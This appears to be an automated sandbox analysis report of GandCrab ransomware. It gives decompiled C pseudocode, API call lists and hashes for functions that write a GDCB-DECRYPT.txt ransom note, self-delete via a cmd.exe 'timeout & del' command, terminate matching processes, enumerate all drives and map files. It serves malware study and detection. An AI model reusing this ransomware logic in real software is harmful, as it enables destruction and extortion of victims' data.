CreateFileMappingW.KERNEL32(00000000,00000000,00000008,00000000,00000000,00000000,?,?,?,?,00D75482), ref: 00D752D4
MapViewOfFile.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,?,?,?,00D75482), ref: 00D752EA
lstrlenW.KERNEL32(?,?,?,?,?,00D75482), ref: 00D752FE
lstrlenA.KERNEL32(0000004E,?,?,?,?,00D75482), ref: 00D7530A
lstrlenA.KERNEL32(0000004E,?,?,?,?,00D75482), ref: 00D75329
UnmapViewOfFile.KERNEL32(?,?,?,?,?,00D75482), ref: 00D7533B
CloseHandle.KERNEL32(?,?,?,?,?,00D75482), ref: 00D7534A
CloseHandle.KERNEL32(00000000,?,?,?,?,00D75482), ref: 00D75351
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,00D75482), ref: 00D7535F

Memory Dump Source

Source File: 0000000B.00000002.293470647.0000000000D71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D70000, based on PE: true

Associated: 0000000B.00000002.293465200.0000000000D70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293487625.0000000000D79000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293502970.0000000000D82000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293545270.0000000000D84000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_d70000_qvvfpl.jbxd

Yara matches

Similarity

API ID: File$lstrlen$CloseCreateHandleViewVirtual$AllocFreeMappingModuleNameUnmap
String ID:
API String ID: 869890170-0
Opcode ID: f6a56cd3c8f116fffdfe9f876e154fc11a97e8fcb0d2562a30c5e8d93965f274
Instruction ID: d01dc367194b1f50d8f4971da93d106f5ff52342d13c4c41f460348d9191ade5
Opcode Fuzzy Hash: f6a56cd3c8f116fffdfe9f876e154fc11a97e8fcb0d2562a30c5e8d93965f274
Instruction Fuzzy Hash: F8310632740705BBEB200B649C5EF5DBB78AB04B01F640014FB05FA2E1EAF1A510CB74

Uniqueness

Uniqueness Score: -1.00%

Function 00D76640 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 59
filememorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00D76640(void* __ecx) {
				long _v8;
				WCHAR* _t7;
				signed int _t16;
				void* _t21;
				void* _t22;
				void* _t25;

				_t25 = VirtualAlloc(0, 0x402, 0x3000, 0x40);
				wsprintfW(_t25, L"%s\\GDCB-DECRYPT.txt", _t21);
				_t22 = CreateFileW(_t25, 0x40000000, 0, 0, 1, 0x80, 0);
				if(_t22 != 0xffffffff) {
					_t7 =  *0xd82b04; // 0x0
					if(_t7 != 0) {
						WriteFile(_t22,  *0xd82b04, lstrlenW(_t7) + _t11,  &_v8, 0);
					}
					CloseHandle(_t22);
					_t16 = 1;
				} else {
					_t16 = 0 | GetLastError() == 0x000000b7;
				}
				VirtualFree(_t25, 0, 0x8000);
				return _t16;
			}

0x00d7665b
0x00d76663
0x00d76685
0x00d7668a
0x00d7669e
0x00d766a5
0x00d766be
0x00d766be
0x00d766c5
0x00d766cb
0x00d7668c
0x00d76699
0x00d76699
0x00d766d8
0x00d766e6

APIs

VirtualAlloc.KERNEL32(00000000,00000402,00003000,00000040,00000000,?,?,?,?,00D76722,00000000,?,?), ref: 00D76655
wsprintfW.USER32 ref: 00D76663
CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000001,00000080,00000000,?,?), ref: 00D7667F
GetLastError.KERNEL32(?,?), ref: 00D7668C
lstrlenW.KERNEL32(00000000,?,00000000,?,?), ref: 00D766AE
WriteFile.KERNEL32(00000000,00000000,?,?), ref: 00D766BE
CloseHandle.KERNEL32(00000000,?,?), ref: 00D766C5
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?), ref: 00D766D8

Strings

%s\GDCB-DECRYPT.txt, xrefs: 00D7665D

Memory Dump Source

Source File: 0000000B.00000002.293470647.0000000000D71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D70000, based on PE: true

Associated: 0000000B.00000002.293465200.0000000000D70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293487625.0000000000D79000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293502970.0000000000D82000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293545270.0000000000D84000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_d70000_qvvfpl.jbxd

Yara matches

Similarity

API ID: FileVirtual$AllocCloseCreateErrorFreeHandleLastWritelstrlenwsprintf
String ID: %s\GDCB-DECRYPT.txt
API String ID: 2985722263-4054134092
Opcode ID: 55b3be2aa7ee2245d8176eca56a1d4411ad2de1475528b9ac50443cfdd920aa5
Instruction ID: 8474b17f2a08b8f3e4caabd9cdd4d40035753176d8252827d04f247bfff31230
Opcode Fuzzy Hash: 55b3be2aa7ee2245d8176eca56a1d4411ad2de1475528b9ac50443cfdd920aa5
Instruction Fuzzy Hash: 0301B1763803007BE7201B64AC5EF6A7B6CEB45B21F900124FF09E92D0FBA0A854C679

Uniqueness

Uniqueness Score: -1.00%

Function 00D74FD0 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 37
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00D74FD0() {
				WCHAR* _t6;
				short* _t8;

				_t6 = VirtualAlloc(0, 0x400, 0x3000, 4);
				_t8 = VirtualAlloc(0, 0x400, 0x3000, 4);
				if(_t6 != 0) {
					GetModuleFileNameW(0, _t6, 0x200);
					if(_t8 != 0) {
						wsprintfW(_t8, L"/c timeout -c 5 & del \"%s\" /f /q", _t6);
						ShellExecuteW(0, L"open", L"cmd.exe", _t8, 0, 0);
					}
				}
				ExitProcess(0);
			}

0x00d74ff6
0x00d74ffa
0x00d74ffe
0x00d75008
0x00d75010
0x00d75019
0x00d75033
0x00d75033
0x00d75010
0x00d7503b

APIs

VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,00000000,?,00D7526B,00000000), ref: 00D74FE6
VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 00D74FF8
GetModuleFileNameW.KERNEL32(00000000,00000000,00000200), ref: 00D75008
wsprintfW.USER32 ref: 00D75019
ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 00D75033
ExitProcess.KERNEL32 ref: 00D7503B

Strings

open, xrefs: 00D7502C
cmd.exe, xrefs: 00D75027
/c timeout -c 5 & del "%s" /f /q, xrefs: 00D75013

Memory Dump Source

Source File: 0000000B.00000002.293470647.0000000000D71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D70000, based on PE: true

Associated: 0000000B.00000002.293465200.0000000000D70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293487625.0000000000D79000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293502970.0000000000D82000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293545270.0000000000D84000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_d70000_qvvfpl.jbxd

Yara matches

Similarity

API ID: AllocVirtual$ExecuteExitFileModuleNameProcessShellwsprintf
String ID: /c timeout -c 5 & del "%s" /f /q$cmd.exe$open
API String ID: 4033023619-516011104
Opcode ID: 8f27b672d91313a89559d5ce87076932410dbd048d84ad0c7b7b47ddeacf14b6
Instruction ID: b50a2b58522981fc2fbbbe139717aa213e2b306e91a0dac73b452a4c947be13f
Opcode Fuzzy Hash: 8f27b672d91313a89559d5ce87076932410dbd048d84ad0c7b7b47ddeacf14b6
Instruction Fuzzy Hash: CEF01C32BC572176F1311B601C1FF47AE289B85F56F544014FB0CBE2D4A9E0645486B9

Uniqueness

Uniqueness Score: -1.00%

Function 00D72C50 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 62
stringthreadCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00D72C50(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				struct tagPAINTSTRUCT _v68;
				struct tagPAINTSTRUCT _v88;
				short _v100;
				intOrPtr _t13;
				void* _t15;
				struct HDC__* _t21;
				int _t30;

				_t13 =  *0xd7e290; // 0x21
				asm("movdqu xmm0, [0xd7e280]");
				_t30 = _a8;
				_v88.fErase = _t13;
				asm("movdqu [esp+0x10], xmm0");
				_t15 = _t30 - 2;
				if(_t15 == 0) {
					CreateThread(0, 0, E00D72AD0, 0, 0, 0);
					DestroyWindow(_a4);
					return 0xdeadbeef;
				} else {
					if(_t15 == 0xd) {
						_t21 = BeginPaint(_a4,  &_v68);
						TextOutW(_t21, 5, 5,  &_v100, lstrlenW( &_v100));
						EndPaint(_a4,  &_v88);
						return 0;
					} else {
						return DefWindowProcW(_a4, _t30, _a12, _a16);
					}
				}
			}

0x00d72c59
0x00d72c5e
0x00d72c66
0x00d72c69
0x00d72c70
0x00d72c76
0x00d72c79
0x00d72ce9
0x00d72cf2
0x00d72d01
0x00d72c7b
0x00d72c7e
0x00d72c9f
0x00d72cbd
0x00d72ccb
0x00d72cd7
0x00d72c80
0x00d72c94
0x00d72c94
0x00d72c7e

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 00D72C8A
BeginPaint.USER32(?,?), ref: 00D72C9F
lstrlenW.KERNEL32(?), ref: 00D72CAC
TextOutW.GDI32(00000000,00000005,00000005,?,00000000), ref: 00D72CBD
EndPaint.USER32(?,?), ref: 00D72CCB
CreateThread.KERNEL32 ref: 00D72CE9
DestroyWindow.USER32(?), ref: 00D72CF2

Strings

GandCrab!, xrefs: 00D72C5E

Memory Dump Source

Source File: 0000000B.00000002.293470647.0000000000D71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D70000, based on PE: true

Associated: 0000000B.00000002.293465200.0000000000D70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293487625.0000000000D79000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293502970.0000000000D82000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293545270.0000000000D84000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_d70000_qvvfpl.jbxd

Yara matches

Similarity

API ID: PaintWindow$BeginCreateDestroyProcTextThreadlstrlen
String ID: GandCrab!
API String ID: 572880375-2223329875
Opcode ID: 681feb6e833bd947af543ce24e8a5cb48aec673d99fc19e4eada793d3845a94d
Instruction ID: f98e715b0a34866b97a49fccf955d1fc4807601423de1466da82ccd03387feae
Opcode Fuzzy Hash: 681feb6e833bd947af543ce24e8a5cb48aec673d99fc19e4eada793d3845a94d
Instruction Fuzzy Hash: 48115E32504309ABD7119F58EC0AFAA7BA8FB48311F004616FD49D52A0F77199A4DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00D747F8 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 46
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00D747F8(void* __ebx, WCHAR* __ecx, void* __esi, void* __ebp, void* _a12) {
				int _t8;
				int _t9;
				void* _t15;
				WCHAR* _t17;
				void* _t18;
				signed int _t23;
				void* _t24;
				void* _t28;

				_t17 = __ecx;
				_t15 = __ebx;
				while(1) {
					L2:
					_t8 = lstrcmpiW( *(_t28 + 0x14 + _t23 * 4), _t17);
					if(_t8 == 0) {
						_t18 = OpenProcess(1, _t8,  *(_t15 + 8));
						if(_t18 != 0) {
							TerminateProcess(_t18, 0);
							CloseHandle(_t18);
						}
					}
					_t23 = _t23 + 1;
					_t5 = _t15 + 0x24; // 0x24
					_t17 = _t5;
					if(_t23 < 0x27) {
						continue;
					}
					L7:
					_t24 = _a12;
					_t9 = Process32NextW(_t24, _t15);
					_t7 = _t15 + 0x24; // 0x24
					_t17 = _t7;
					if(_t9 != 0) {
						_t23 = 0;
						do {
							goto L2;
						} while (_t23 < 0x27);
						goto L7;
					}
					if(_t15 != 0) {
						VirtualFree(_t15, 0, 0x8000);
					}
					return CloseHandle(_t24);
					L2:
					_t8 = lstrcmpiW( *(_t28 + 0x14 + _t23 * 4), _t17);
					if(_t8 == 0) {
						_t18 = OpenProcess(1, _t8,  *(_t15 + 8));
						if(_t18 != 0) {
							TerminateProcess(_t18, 0);
							CloseHandle(_t18);
						}
					}
					_t23 = _t23 + 1;
					_t5 = _t15 + 0x24; // 0x24
					_t17 = _t5;
				}
			}

0x00d747f8
0x00d747f8
0x00d74800
0x00d74800
0x00d74805
0x00d7480d
0x00d7481b
0x00d7481f
0x00d74824
0x00d74831
0x00d74831
0x00d7481f
0x00d7483b
0x00d7483c
0x00d7483c
0x00d74842
0x00000000
0x00000000
0x00d74844
0x00d74844
0x00d7484a
0x00d74850
0x00d74850
0x00d74855
0x00d747f4
0x00d74800
0x00000000
0x00000000
0x00000000
0x00d74800
0x00d74859
0x00d74863
0x00d74863
0x00d74872
0x00d74800
0x00d74805
0x00d7480d
0x00d7481b
0x00d7481f
0x00d74824
0x00d74831
0x00d74831
0x00d7481f
0x00d7483b
0x00d7483c
0x00d7483c
0x00d7483f

APIs

lstrcmpiW.KERNEL32(00000002,00000024), ref: 00D74805
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00D74815
TerminateProcess.KERNEL32(00000000,00000000), ref: 00D74824
CloseHandle.KERNEL32(00000000), ref: 00D74831
Process32NextW.KERNEL32(?,00000000), ref: 00D7484A
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00D74863
CloseHandle.KERNEL32(?), ref: 00D7486A

Strings

iet, xrefs: 00D74805

Memory Dump Source

Source File: 0000000B.00000002.293470647.0000000000D71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D70000, based on PE: true

Associated: 0000000B.00000002.293465200.0000000000D70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293487625.0000000000D79000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293502970.0000000000D82000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293545270.0000000000D84000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_d70000_qvvfpl.jbxd

Yara matches

Similarity

API ID: CloseHandleProcess$FreeNextOpenProcess32TerminateVirtuallstrcmpi
String ID: iet
API String ID: 999196985-2308090442
Opcode ID: 5987f560c36e615ba423a5254f41d15d7dbfd0692d2c81004008ac70368ef433
Instruction ID: 8bbd8492d1d5ba660f351be9cc9ca51f6a74b9909cc23c734e4f10e7f743d1a0
Opcode Fuzzy Hash: 5987f560c36e615ba423a5254f41d15d7dbfd0692d2c81004008ac70368ef433
Instruction Fuzzy Hash: 4701D633200315ABDB111F14AC58BAAB768EF95311F554024FD0DD6260FB219C45CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 00D73DE0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136
memorythreadCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00D73DE0(struct _SECURITY_ATTRIBUTES* __ecx) {
				char _v612;
				char _v644;
				void* _v908;
				void* _v912;
				intOrPtr _v916;
				intOrPtr _v920;
				short _v924;
				signed int _v928;
				intOrPtr _v932;
				void* _v936;
				intOrPtr _v940;
				intOrPtr _v944;
				intOrPtr _v948;
				long _v952;
				struct _SECURITY_ATTRIBUTES* _v956;
				struct _SECURITY_ATTRIBUTES* _v960;
				struct _SECURITY_ATTRIBUTES* _v964;
				char _v968;
				void* _t67;
				short _t68;
				intOrPtr _t69;
				int _t72;
				long _t75;
				signed int _t77;
				signed int _t80;
				intOrPtr* _t82;
				void* _t84;
				struct _SECURITY_ATTRIBUTES* _t87;
				long _t88;
				intOrPtr _t89;
				intOrPtr _t92;
				intOrPtr _t95;
				char _t101;
				intOrPtr _t106;
				void _t110;
				struct _SECURITY_ATTRIBUTES** _t114;
				intOrPtr _t115;
				signed int _t119;
				void* _t121;

				_t121 = (_t119 & 0xfffffff8) - 0x3c4;
				_t87 = __ecx;
				_v964 = __ecx;
				_t67 = VirtualAlloc(0, 0x18, 0x3000, 4);
				 *((intOrPtr*)(_t67 + 4)) = _t87;
				_t88 = 0;
				 *_t67 = 0x43;
				_t68 =  *L"?:\\"; // 0x3a003f
				_v924 = _t68;
				_t69 =  *0xd7e308; // 0x5c
				_v920 = _t69;
				_v968 = GetTickCount();
				_t114 =  &_v644;
				_t110 = 0x41;
				do {
					_v924 = _t110;
					_t72 = GetDriveTypeW( &_v924);
					if(_t72 >= 2 && _t72 != 5) {
						 *((intOrPtr*)(_t114 - 4)) = _v964;
						_t84 = _t114 - 8;
						 *_t84 = _t110;
						 *_t114 = 0;
						_t114[2] = 0;
						_t114[3] = 0;
						 *((intOrPtr*)(_t121 + 0x48 + _t88 * 4)) = CreateThread(0, 0, E00D76840, _t84, 0, 0);
						_t88 = _t88 + 1;
						_t114 =  &(_t114[6]);
					}
					_t110 = _t110 + 1;
				} while (_t110 <= 0x5a);
				_v952 = _t88;
				asm("xorps xmm0, xmm0");
				_v956 = 0;
				_v960 = 0;
				asm("movlpd [esp+0x38], xmm0");
				asm("movlpd [esp+0x30], xmm0");
				WaitForMultipleObjects(_t88,  &_v908, 1, 0xffffffff);
				_t75 = GetTickCount();
				asm("xorps xmm0, xmm0");
				_t115 = _v948;
				_v932 = _t75 - _v968;
				_t77 = 0;
				_v964 = 0;
				asm("movlpd [esp+0x40], xmm0");
				if(_t88 < 2) {
					_t95 = _v940;
					_t106 = _v944;
				} else {
					_t26 = _t88 - 2; // -1
					_t92 = _v940;
					_t82 =  &_v612;
					_t101 = (_t26 >> 1) + 1;
					_v968 = _t101;
					_v928 = _t101 + _t101;
					_t106 = _v944;
					do {
						_t92 = _t92 +  *((intOrPtr*)(_t82 - 0x18));
						_v956 = _v956 +  *((intOrPtr*)(_t82 - 0x20));
						asm("adc edi, [eax-0x14]");
						_t115 = _t115 +  *_t82;
						_v960 = _v960 +  *((intOrPtr*)(_t82 - 8));
						asm("adc edx, [eax+0x4]");
						_t82 = _t82 + 0x30;
						_t41 =  &_v968;
						 *_t41 = _v968 - 1;
					} while ( *_t41 != 0);
					_t77 = _v928;
					_v968 = _t92;
					_t88 = _v952;
					_t95 = _v968;
				}
				if(_t77 >= _t88) {
					_t89 = _v916;
				} else {
					_t80 = _t77 + _t77 * 2;
					_v964 =  *((intOrPtr*)(_t121 + 0x150 + _t80 * 8));
					_t89 =  *((intOrPtr*)(_t121 + 0x158 + _t80 * 8));
				}
				asm("adc edx, edi");
				asm("adc edx, eax");
				return E00D75540(_v960 + _v956 + _v964, _v932, _t115 + _t95 + _t89, _t106);
			}

0x00d73de6
0x00d73df8
0x00d73dfc
0x00d73e00
0x00d73e0b
0x00d73e0e
0x00d73e10
0x00d73e13
0x00d73e18
0x00d73e1c
0x00d73e21
0x00d73e2b
0x00d73e2f
0x00d73e36
0x00d73e40
0x00d73e44
0x00d73e4a
0x00d73e53
0x00d73e62
0x00d73e65
0x00d73e72
0x00d73e75
0x00d73e7b
0x00d73e82
0x00d73e8f
0x00d73e93
0x00d73e94
0x00d73e94
0x00d73e97
0x00d73e98
0x00d73ea6
0x00d73eaa
0x00d73ead
0x00d73eb7
0x00d73ebf
0x00d73ec5
0x00d73ecb
0x00d73ed1
0x00d73edb
0x00d73ee2
0x00d73ee6
0x00d73eea
0x00d73eec
0x00d73ef4
0x00d73efd
0x00d73f5c
0x00d73f60
0x00d73eff
0x00d73eff
0x00d73f02
0x00d73f08
0x00d73f0f
0x00d73f10
0x00d73f17
0x00d73f1b
0x00d73f20
0x00d73f27
0x00d73f2a
0x00d73f2e
0x00d73f38
0x00d73f3a
0x00d73f3e
0x00d73f41
0x00d73f44
0x00d73f44
0x00d73f44
0x00d73f4a
0x00d73f4e
0x00d73f52
0x00d73f56
0x00d73f56
0x00d73f66
0x00d73f8a
0x00d73f68
0x00d73f68
0x00d73f72
0x00d73f76
0x00d73f7d
0x00d73f94
0x00d73f98
0x00d73fb6

APIs

VirtualAlloc.KERNEL32(00000000,00000018,00003000,00000004), ref: 00D73E00
GetTickCount.KERNEL32 ref: 00D73E25
GetDriveTypeW.KERNEL32(?), ref: 00D73E4A
CreateThread.KERNEL32 ref: 00D73E89
WaitForMultipleObjects.KERNEL32(00000000,?), ref: 00D73ECB
GetTickCount.KERNEL32 ref: 00D73ED1

Strings

?:\, xrefs: 00D73E13

Memory Dump Source

Source File: 0000000B.00000002.293470647.0000000000D71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D70000, based on PE: true

Associated: 0000000B.00000002.293465200.0000000000D70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293487625.0000000000D79000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293502970.0000000000D82000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293545270.0000000000D84000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_d70000_qvvfpl.jbxd

Yara matches

Similarity

API ID: CountTick$AllocCreateDriveMultipleObjectsThreadTypeVirtualWait
String ID: ?:\
API String ID: 458387131-2533537817
Opcode ID: 3aaa249a6648d37740b061f4202327888fc76a3d154327d56efd7c02dd1262f7
Instruction ID: 86b838c8c7d676b28d35cc4c5182c2dd32f9918224bab5fc38c70236180ac606
Opcode Fuzzy Hash: 3aaa249a6648d37740b061f4202327888fc76a3d154327d56efd7c02dd1262f7
Instruction Fuzzy Hash: 235116719083009FD310CF18D898B5AFBE5FF88714F548A2DF98997360E771A944CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 00D76840 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47
memorythreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00D76840(void* _a4) {
				intOrPtr _v0;
				intOrPtr _v4;
				long _v8;
				intOrPtr _v12;
				void* _v16;
				struct _CRITICAL_SECTION _v40;
				WCHAR* _t12;
				void* _t22;

				_t12 = VirtualAlloc(0, 0x401, 0x3000, 0x40);
				_t22 = _a4;
				wsprintfW(_t12, L"%c:\\",  *_t22 & 0x0000ffff);
				InitializeCriticalSection( &_v40);
				_v12 = 0x2710;
				_v8 = 0;
				_v4 = 0xffffffff;
				_v0 = 0xffffffff;
				_v16 = VirtualAlloc(0, 0x9c40, 0x3000, 4);
				E00D766F0(_t22 + 8, _t12,  &_v40,  *((intOrPtr*)(_t22 + 4)), _t22 + 8, _t22 + 0x10);
				VirtualFree(_t22, 0, 0x8000);
				ExitThread(0);
			}

0x00d76859
0x00d7685f
0x00d7686e
0x00d7687c
0x00d76890
0x00d76898
0x00d768a0
0x00d768a8
0x00d768b6
0x00d768cb
0x00d768db
0x00d768e3

APIs

VirtualAlloc.KERNEL32(00000000,00000401,00003000,00000040), ref: 00D76859
wsprintfW.USER32 ref: 00D7686E
InitializeCriticalSection.KERNEL32(?), ref: 00D7687C
VirtualAlloc.KERNEL32 ref: 00D768B0

Part of subcall function 00D766F0: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 00D76723
Part of subcall function 00D766F0: lstrcatW.KERNEL32(00000000,00D80364), ref: 00D7673B
Part of subcall function 00D766F0: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 00D76745

VirtualFree.KERNEL32(?,00000000,00008000,00009C40,00003000,00000004), ref: 00D768DB
ExitThread.KERNEL32 ref: 00D768E3

Strings

%c:\, xrefs: 00D76868

Memory Dump Source

Source File: 0000000B.00000002.293470647.0000000000D71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D70000, based on PE: true

Associated: 0000000B.00000002.293465200.0000000000D70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293487625.0000000000D79000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293502970.0000000000D82000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293545270.0000000000D84000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_d70000_qvvfpl.jbxd

Yara matches

Similarity

API ID: Virtual$Alloc$CriticalExitFileFindFirstFreeInitializeSectionThreadlstrcatlstrlenwsprintf
String ID: %c:\
API String ID: 1988002015-3142399695
Opcode ID: 2e2482923dcac890421d116ca2d1efabf7402c02a905748d5b5cb487963c3a66
Instruction ID: 95b10bf64914a3407e8e154f031ca6caeb72ad69fd3da89b06d095ac36a765b6
Opcode Fuzzy Hash: 2e2482923dcac890421d116ca2d1efabf7402c02a905748d5b5cb487963c3a66
Instruction Fuzzy Hash: 850184B5144300BFE7109F60CC9EF5A7BA8AB44B20F404614FF69D92D1E7B09554CB76

Uniqueness

Uniqueness Score: -1.00%

Function 00D72890 Relevance: 12.1, APIs: 8, Instructions: 90
fileCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00D72890(WCHAR* __ecx, intOrPtr __edx) {
				long _v8;
				intOrPtr _v12;
				void* _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t14;
				void* _t18;
				void* _t23;
				WCHAR* _t29;
				void* _t34;
				signed int _t35;
				long _t37;
				void* _t38;
				void* _t40;

				_t29 = __ecx;
				_t28 = 0;
				_v12 = __edx;
				_t34 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0, 0);
				if(_t34 == 0xffffffff) {
					L3:
					return 0;
				} else {
					_v8 = GetFileSize(_t34, 0);
					E00D73030(0, _t34, _t35);
					asm("sbb esi, esi");
					_t37 = (_t35 & 0x00000003) + 1;
					_t14 = E00D73030(0, _t34, _t37);
					asm("sbb eax, eax");
					_t18 = CreateFileMappingW(_t34, 0, ( ~_t14 & 0xfffffffa) + 8, 0, 0, 0);
					_v16 = _t18;
					if(_t18 != 0) {
						_t38 = MapViewOfFile(_t18, _t37, 0, 0, 0);
						if(_t38 != 0) {
							_t23 = E00D73030(0, _t34, _t38);
							if(_t23 == 0) {
								_push(_t29);
								_t4 = _t38 + 0x53; // 0x53
								_t29 = _t4;
								_t5 = _t23 + 6; // 0x6
								E00D77DB0(_t29, _t5);
								_t40 = _t40 + 4;
							}
							_push(_t29);
							_t28 = E00D72830(_v12, _t38, _v8);
							UnmapViewOfFile(_t38);
						}
						CloseHandle(_v16);
						CloseHandle(_t34);
						return _t28;
					} else {
						CloseHandle(_t34);
						goto L3;
					}
				}
			}

0x00d72890
0x00d72899
0x00d7289b
0x00d728b1
0x00d728b6
0x00d728f9
0x00d72901
0x00d728b8
0x00d728c0
0x00d728c3
0x00d728ca
0x00d728cf
0x00d728d0
0x00d728d8
0x00d728e5
0x00d728eb
0x00d728f0
0x00d72910
0x00d72914
0x00d72916
0x00d7291d
0x00d7291f
0x00d72920
0x00d72920
0x00d72923
0x00d72926
0x00d7292b
0x00d7292b
0x00d7292e
0x00d7293f
0x00d72942
0x00d72942
0x00d72951
0x00d72954
0x00d7295e
0x00d728f2
0x00d728f3
0x00000000
0x00d728f3
0x00d728f0

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,746982B0,00000000,?,?,00D72C02), ref: 00D728AB
GetFileSize.KERNEL32(00000000,00000000,?,?,00D72C02), ref: 00D728BA
CreateFileMappingW.KERNEL32(00000000,00000000,-00000008,00000000,00000000,00000000,?,?,00D72C02), ref: 00D728E5
CloseHandle.KERNEL32(00000000,?,?,00D72C02), ref: 00D728F3
MapViewOfFile.KERNEL32(00000000,746982B1,00000000,00000000,00000000,?,?,00D72C02), ref: 00D7290A
UnmapViewOfFile.KERNEL32(00000000,?,?,?,?,00D72C02), ref: 00D72942
CloseHandle.KERNEL32(?,?,?,00D72C02), ref: 00D72951
CloseHandle.KERNEL32(00000000,?,?,00D72C02), ref: 00D72954

Memory Dump Source

Source File: 0000000B.00000002.293470647.0000000000D71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D70000, based on PE: true

Associated: 0000000B.00000002.293465200.0000000000D70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293487625.0000000000D79000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293502970.0000000000D82000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293545270.0000000000D84000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_d70000_qvvfpl.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreateView$MappingSizeUnmap
String ID:
API String ID: 265113797-0
Opcode ID: d450e19c150d643464c38b2101e14d6d3a70cb01936b213b3e29c0aeb2a59408
Instruction ID: 2bd52ac87a13142be465aab402e9c8b964080e36899dbc2a3eb09f70924430ee
Opcode Fuzzy Hash: d450e19c150d643464c38b2101e14d6d3a70cb01936b213b3e29c0aeb2a59408
Instruction Fuzzy Hash: CE212672A4031A7FE7206B749C8AF7FB76CEB45764F448264FD09E2280F6309D1189B1

Uniqueness

Uniqueness Score: -1.00%

Function 00D74B10 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51
processCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00D74B10(WCHAR* __ecx) {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOW _v92;
				intOrPtr _t15;
				intOrPtr _t16;
				WCHAR* _t25;

				asm("xorps xmm0, xmm0");
				_t25 = __ecx;
				asm("movdqu [ebp-0x10], xmm0");
				E00D78B30( &_v92, 0, 0x44);
				_t15 =  *0xd82b0c; // 0x0
